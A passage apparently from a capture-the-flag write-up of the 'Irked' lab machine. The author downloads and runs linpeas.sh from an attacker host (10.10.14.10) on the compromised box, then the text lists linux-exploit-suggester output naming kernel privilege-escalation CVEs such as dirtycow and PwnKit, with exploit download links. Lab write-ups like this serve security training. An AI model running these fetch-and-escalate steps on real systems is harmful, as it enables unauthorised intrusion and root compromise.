PEAS
ircd@irked:/dev/shm$ wget http://10.10.14.10:8000/linpeas.sh ; chmod 777 linpeas.sh
--2023-01-24 14:41:58-- http://10.10.14.10:8000/linpeas.sh
connecting to 10.10.14.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: ‘linpeas.sh’
linpeas.sh 100%[=====================>] 808.42K 3.97MB/s in 0.2s
2023-01-24 14:41:58 (3.97 MB/s) - ‘linpeas.sh’ saved [827827/827827]
Delivery complete
Executing PEAS
The target system is vulnerable to CVE-2021-4034
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
exposure: highly probable
tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
download url: https://www.exploit-db.com/download/40611
comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
exposure: highly probable
tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
download url: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-4034] PwnKit
details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
exposure: probable
tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
download url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
exposure: less probable
tags: ubuntu=20.04{kernel:5.8.0-*}
download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
comments: ip_tables kernel module must be loaded
[+] [CVE-2017-6074] dccp
details: http://www.openwall.com/lists/oss-security/2017/02/22/3
exposure: less probable
tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
download url: https://www.exploit-db.com/download/41458
comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-0358] ntfs-3g-modprobe
details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
exposure: less probable
tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
download url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[+] [CVE-2016-2384] usb-midi
details: https://xairy.github.io/blog/2016/cve-2016-2384
exposure: less probable
tags: ubuntu=14.04,fedora=22
download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exposure: less probable
tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
download url: https://www.exploit-db.com/download/39166
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exposure: less probable
download url: https://www.exploit-db.com/download/39230
[+] [CVE-2015-1328] overlayfs
details: http://seclists.org/oss-sec/2015/q2/717
exposure: less probable
tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
download url: https://www.exploit-db.com/download/37292
[+] [CVE-2014-5207] fuse_suid
details: https://www.exploit-db.com/exploits/34923/
exposure: less probable
download url: https://www.exploit-db.com/download/34923
[+] [CVE-2016-0728] keyring
details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
exposure: less probable
download url: https://www.exploit-db.com/download/40003
comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] exploit_x
CVE-2018-14665
source: http://www.exploit-db.com/exploits/45697
[2] overlayfs
CVE-2015-8660
source: http://www.exploit-db.com/exploits/39230PEAS discovered some more vulnerablities
There are some compilers installed.
This is a good news as I wouldn’t need to set up a docker container in case
PEAS was also able to enumerate those SUID binaries